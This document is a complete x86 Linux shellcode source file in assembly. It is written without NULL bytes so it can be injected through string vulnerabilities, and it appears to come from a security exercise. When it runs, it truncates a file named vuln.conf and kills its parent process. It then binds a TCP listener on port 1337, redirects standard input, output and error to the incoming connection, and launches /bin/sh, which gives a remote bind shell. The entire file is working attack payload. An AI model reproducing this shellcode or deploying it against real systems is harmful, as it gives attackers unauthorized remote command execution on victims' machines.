#Deian Stefan
#shellcode: remote shell that can be used
#with string vulneralbilities --no NULL characters
#1.truncates vuln.conf
#2.fork,listen(tcp) on port 1337 and redirect i/o to socket
#3.execve /bin/sh 

	.text
.globl _start
.globl main
	.type	main, @function
_start:
main:
	#next 2 lines will be deleted
	#pushl	%ebp
	#movl	%esp, %ebp

	xor	%eax,%eax
	mov	$2,%al
	int 	$0x80		#fork()

	xor	%ebx,%ebx
	cmpl	%ebx,%eax
	jne	kid

	movl 	%eax,%ebx 	#in parent
	xor	%eax,%eax
	mov	$7,%al		#movl $7,%eax
	int 	$0x80 		#waitpid(-1,0,0)

kid:	 			#in child
	xor	%eax,%eax
	mov	$64,%al		#movl 	$64,%eax
	int 	$0x80 		#getppid()
	movl	%eax,%ebx

	xor	%eax,%eax
	mov 	$37,%al		#movl 	$37,%eax
	xor	%ecx,%ecx
	mov	$9,%cl		#movl $9,%ecx
	int 	$0x80		#kill(ppid,9) parent

	xor	%ecx,%ecx
	push	%ecx
	push	$0x666e6f63	#conf
	push	$0x2e6e6c75	#uln.
	push	$0x762f2f2e	#.//v
	movl	%esp,%ebx
	sub 	$12,%esp	#stack align
	mov	$1,%cl
	mov 	$2,%ch		#movl $513,%ecx
	xor	%eax,%eax	
	mov	$5,%al		#movl $5,%eax
	int	$0x80		#open(".//vuln.conf",O_RDONLY|O_TRUNC)

	subl	$0x20,%esp 

#__NR_socketcall SYS_SOCKET (AF_INET,SOCK_STREAM,IPPROTO_TCP)
#/usr/include/asm-i386/unistd.h
	xor	%eax,%eax
	mov	$102,%al		#__NR_socketcall=102
	xor	%ebx,%ebx
	mov	$6,%bl
	mov	%ebx,0x8(%esp)		#IPPROTO_TCP=6
	mov	$2,%bl			#AF_INET=2
	movl	%ebx,(%esp)
	decl	%ebx
	movl	%ebx,0x4(%esp)		#SYS_SOCKET=1
	movl	%esp,%ecx
	int	$0x80

	movl	%eax,-8(%esp)		#sfd, socket file descriptor

	xorl	%edx,%edx
#	bind(sfd,sockaddr*,len)
#	sockaddr=[short family,ushort port,ulong add,char zero[8]]
	mov	$2,%dl
	mov	%edx,0xc(%esp)		#family=AF_INET
	movw	$0x3905,%dx		
	movl	%edx,0xe(%esp)		#port=1337 
	xorl	%edx,%edx
	movl	%edx,0x10(%esp)		#zero[8]
	movl	%eax,(%esp)		#1st arg
	leal	0xc(%esp),%ebx		#pointer to sockaddr
	movl	%ebx,0x4(%esp)		#2nd arg
	xor	%eax,%eax
	mov	$0x10,%al
	movl	%eax,0x8(%esp)		#3rd arg

	mov	$102,%al		#__NR_socketcall=102
	xor	%ebx,%ebx
	mov	$2,%bl			#SYS_BIND =2

	int 	$0x80

	movl	-8(%esp),%eax	

#	listen(sfd,1);
	movl	%eax,(%esp)
	xor	%eax,%eax
	incl	%eax
	movl	%eax,0x4(%esp)
	mov	$102,%al		#__NR_socketcall=102
	xor	%ebx,%ebx
	mov	$4,%bl			#SYS_LISTEN = 4
	int 	$0x80


#	accept(sfd, sockaddr*, len*);

	xor	%eax,%eax
	mov	$0x10,%al
	movl	%eax,-12(%esp)
	movl	-8(%esp),%eax
#	movl    $0x10,-12(%esp)		
	leal    -12(%esp),%esi		#len *


	movl	%eax,(%esp)
	leal	0xc(%esp),%ebx
	movl	%ebx,0x4(%esp)
	movl	%esi,0x8(%esp)
	xor     %eax,%eax
	mov	$102,%al		#__NR_socketcall=102
	xor     %ebx,%ebx
	mov	$5,%bl			#SYS_ACCEPT = 5
	int	$0x80


	#duping, avoid loops
	xor	%ecx,%ecx
	mov	$2,%cl
dup:
	pushl	%eax
	movl	%eax,%ebx
	xor     %eax,%eax
        mov     $63,%al
        int     $0x80
	decl    %ecx
        popl    %eax
	jns	dup

	#dup2(sfd,2)
	#pushl	%eax
	#movl	%eax,%ebx
	#xor     %eax,%eax
        #mov     $63,%al
	#int	$0x80
	#dup2(sfd,1)
	#decl	%ecx
	#popl	%eax
	#pushl	%eax
	#movl    %eax,%ebx
	#xor     %eax,%eax
        #mov     $63,%al
	#int	$0x80
	#dup2(sfd,0)
	#decl    %ecx
        #popl    %eax
	#pushl	%eax
        #movl    %eax,%ebx
	#xor     %eax,%eax
        #mov     $63,%al
        #int     $0x80

	

#	execve("/bin//sh\0",0,0)

#	create the string
	xor	%eax,%eax
	xor	%ecx,%ecx
	xor	%edx,%edx
	movl	%eax,-16(%esp)
	movl	$0x68732f2f, -20(%esp) #//sh
	movl	$0x6e69622f, -24(%esp) #/bin
	leal 	-24(%esp),%ebx

	mov	$11,%al
	movl	%ebx,(%esp)
	movl	%edx,0x4(%esp)
	movl	%esp,%ecx
	int	$0x80

#	exit(0)
#	movl	$1,%eax
#	xor	%ebx,%ebx
#	int	$0x80
#
#	ret